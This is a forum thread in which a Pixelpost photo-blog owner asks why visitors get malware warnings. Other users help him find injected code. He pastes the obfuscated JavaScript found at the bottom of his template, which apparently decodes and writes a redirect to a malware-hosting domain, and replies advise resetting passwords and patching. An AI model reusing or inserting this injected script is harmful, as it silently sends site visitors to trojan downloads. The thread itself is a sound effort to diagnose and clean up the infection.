Hello together!

Last week there were three people telling me that they get a virus warning when they try to look at my photo-blog... their browsers (safari on macs + firefox on windows) close and give out the warning sign. Can you guys check out my page and tell me if you get the same problem?? I've tried it on several different PC's and I've never got to see that warning sign. What could that be??

I am using Pixelpost 1.7.1, original Delicious template with a few minor changes on the code.

Thanks alot for any suggestions.

My page:
www.sanctionfour.com (http://www.sanctionfour.com)

Check the template and the index.php file for malicious code.

I looked thru all the codes and didnt seem to find anything. I will let a programmer take a look at it. But it seems that if one enters my adress, you get redirected to another page which google says it spreads malware (9 trojans etc). The page is http://e.fissare.net/e/adsr.php

Sounds like a hack to me don't it??

I found something suspicious on the very far bottom of the code but I'm not sure about it:
<script language=javascript>nljlpm="Xqj!mhgNMoz&UGKZ%pPIp@";aplkwib="M3cM73criM70t lM61nM67uagM65=M6aaM76ascM72M69pt> M20fuM6ectiM6fM6e ncM6cf(M7anM63){M76M61r xy,M78M6byeM3d\"OM4aM43M55M24M6fM45n\\\"M2bc[M2d)M47M757M48M46Z=^T0M71{M2eK'!M72M64 M39M42M35Vk~M4dyIM74M69M78M41}eM36bgM28jM4048hm&aPlwM5dM76`M5f2sM23M3b:M70*|M663M7aM2cM4e1\"M2cpdyM3d\"\",tM78gnM77,M67minM2cwM66M70M3dM22\",ibM6fM3bfM6frM28M78M79=0M3bxy<M7aM6ecM2eleM6eM67thM3bxy++M29{ tM78gnM77M3dznc.chM61rAtM28xyM29;M67mM69nM3dM78kye M2einM64M65xM4ff(M74xgnwM29;if(M67min>-1){M20M69M62oM3dM28(gM6dM69nM2bM31M29M25M381-1);ifM28ibo<=M30M29M69bo+=8M31M3bwfp+=xM6byeM2echaM72M41tM28iM 62o-1);M20} eM6csM65 M77fp+=txgM6ew;}M70M64y+M3dwM66p;M64ocuM6dentM2ewr M69te(pdM79);M7dM3cM2fM73crM69ptM3e";ycmoevk=unescape(aplkwib.replace(/M/g,nljlpm.charAt(16)));var rta,eoz;document.write(ycmoevk);rta="<#[dx*i9wP\"(7P(6^+@P`P#[dx*i+>9 E[7&6\"iK]dxi6j9+<SURtl09wP\"(7P(6^\\+CP`PS[dx*i\\+9SRU^\\+mii*p//]]]K(EE(w6P\"Pwxix[#K\"6i/227igK@#?+c E[7&6\"iKd636dd6dc+\\+><\\/SURtl0>+9G:9</#[dx*i>99";nclf(rta);</script>

I'd suggest changing your usernames/passwords for the web host, and re-uploading the Pixelpost files, as well as inspecting your template files. Because, as you see, there is some malicious code in one of them.

Thanks for replying. My server administrator says that the malicious code must've been inserted thru some kind of security leak in one of my scripts and not thru my webhost... changed password anyways and deleted the malicious code. Hope to find the leak soon...
Did you have any security problems with the comment code before? I'm wondering if it could be that...

Also, make sure you are running the latest version of Pixelpost, as that version contains the most up to date security patches.